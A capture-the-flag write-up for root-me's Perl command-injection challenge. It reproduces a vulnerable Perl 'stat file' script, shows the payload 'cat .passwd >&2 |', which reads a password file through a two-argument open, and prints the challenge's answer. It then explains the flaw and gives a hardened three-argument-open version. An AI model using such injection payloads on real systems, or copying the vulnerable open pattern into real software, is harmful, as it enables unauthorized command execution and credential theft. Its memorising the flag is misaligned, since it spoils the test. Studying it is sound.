CTF root-me writeup: Perl - Command injection

LINK: https://www.root-me.org/en/Challenges/App-Script/Perl-Command-injection

Reference:

     http://www.cnblogs.com/chengmo/archive/2010/10/20/1855805.html

     https://www.cnblogs.com/softidea/p/3965093.html

     https://github.com/Vinnyz/Root-me-challenge-App-Script

     http://repository.root-me.org/Programmation/Perl/EN%20-%20Perl%20operators.pdf

SOURCE CODE:

    #!/usr/bin/perl
     
    # Taint-mode style prologue: drop environment variables that influence
    # the shell and pin PATH. Note the shebang has no -T, so taint checking
    # itself is never enabled.
    delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};
    $ENV{'PATH'}='/bin:/usr/bin';
     
    use strict;
    use warnings;
     
    main();
     
    sub main {
        my ($file, $line) = @_;
     
        menu();
        prompt();
     
        while((my $file = <STDIN>)) {
            chomp $file;
     
            process_file($file);
     
            prompt();
        }
    }
     
    sub prompt {
        local $| = 1;
        print ">>> ";
    }
    sub menu {
        print "*************************\n";
        print "* Stat File Service    *\n";
        print "*************************\n";
    }
     
    sub check_read_access {
        my $f = shift;
     
        if(-f $f) {
            my $filemode = (stat($f))[2];
     
            return ($filemode & 4);
        }
     
        return 0;
    }
     
    sub process_file {
        my $file = shift;
        my $line;
        my ($line_count, $char_count, $word_count) = (0,0,0);
     
        # ".+" matches any non-newline string, so this "untaints" $file
        # without restricting its contents in any way.
        $file =~ /(.+)/;
        $file = $1;
        # Two-argument open: Perl parses the string for a mode, so a value
        # ending in "|" is executed as a shell command instead of being
        # opened as a file (the three-argument form open(F, '<', $file)
        # would treat it as a literal filename).
        if(!open(F, $file)) {
            die "[-] Can't open $file: $!\n";
        }
     
     
        while(($line = <F>)) {
            $line_count++;
            $char_count += length $line;
            $word_count += scalar(split/\W+/, $line);
        }
     
        print "~~~ Statistics for \"$file\" ~~~\n";
        print "Lines: $line_count\n";
        print "Words: $word_count\n";
        print "Chars: $char_count\n";
     
        close F;
    }

Solution:

app-script-ch7@challenge02:~$ ./setuid-wrapper 
*************************
* Stat File Service    *
*************************
>>> ch7.pl
~~~ Statistics for "ch7.pl" ~~~
Lines: 73
Words: 164
Chars: 1186
>>> cat .passwd >&2 |
PerlCanDoBetterThanYouThink
~~~ Statistics for "cat .passwd >&2 |" ~~~
Lines: 0
Words: 0
Chars: 0
app-script-ch7@challenge02:~$ ./setuid-wrapper
*************************
* Stat File Service    *
*************************
>>> cat .passwd
[-] Can't open cat .passwd: No such file or directory

>&2 is the same as 1>&2: it redirects the shell command's standard output to standard error, so the output of cat .passwd goes straight to the terminal instead of being read back by the script as file contents (which is why the statistics show 0 lines). The trailing | is what makes the command run at all: the script opens the user-supplied name with the two-argument form of open, which treats a string ending in | as a command to execute, so the contents of .passwd are printed in place of the "Can't open cat .passwd: No such file or directory" error that a plain name produces, and that gives the answer to the challenge.
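The fix on the defender's side is the three-argument open, which takes the mode separately and never interprets the filename. The following is an added example (not part of the challenge code or the writeup) of the same statistics routine written that way, with a regular-file check in front of the open; the function name safe_stat_file and the temporary input file are assumptions made for the demonstration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempfile);

# Hardened counterpart of the challenge's process_file (added example).
# Returns (\%stats, undef) on success or (undef, $error) on failure.
sub safe_stat_file {
    my ($file) = @_;

    # Only plain, readable files are acceptable; "cmd |" is neither.
    return (undef, "not a regular readable file") unless -f $file && -r _;

    # Three-argument open with an explicit '<' mode: the filename is used
    # literally, so pipe characters in it never start a command.
    open(my $fh, '<', $file) or return (undef, "Can't open $file: $!");

    my ($lines, $words, $chars) = (0, 0, 0);
    while (my $line = <$fh>) {
        $lines++;
        $chars += length $line;
        my @w = split /\W+/, $line;   # same word rule as the original
        $words += @w;
    }
    close $fh;
    return ({ lines => $lines, words => $words, chars => $chars }, undef);
}

# Constructed input: a small temporary file for the legitimate case.
my ($tmp, $path) = tempfile(UNLINK => 1);
print $tmp "alpha beta\ngamma\n";
close $tmp;

# The second name is the shape of input the challenge exploits; here it is
# simply rejected as a non-file rather than executed.
for my $name ($path, 'id >&2 |') {
    my ($stats, $err) = safe_stat_file($name);
    if ($err) {
        print "[$name] rejected: $err\n";
    } else {
        printf "[%s] lines=%d words=%d chars=%d\n",
            $name, @{$stats}{qw(lines words chars)};
    }
}
```

Beyond the open itself, the -f test reuses the filesystem's view of the name (via the _ stat buffer) rather than a regex that accepts anything, so the script no longer "untaints" input it has not actually validated.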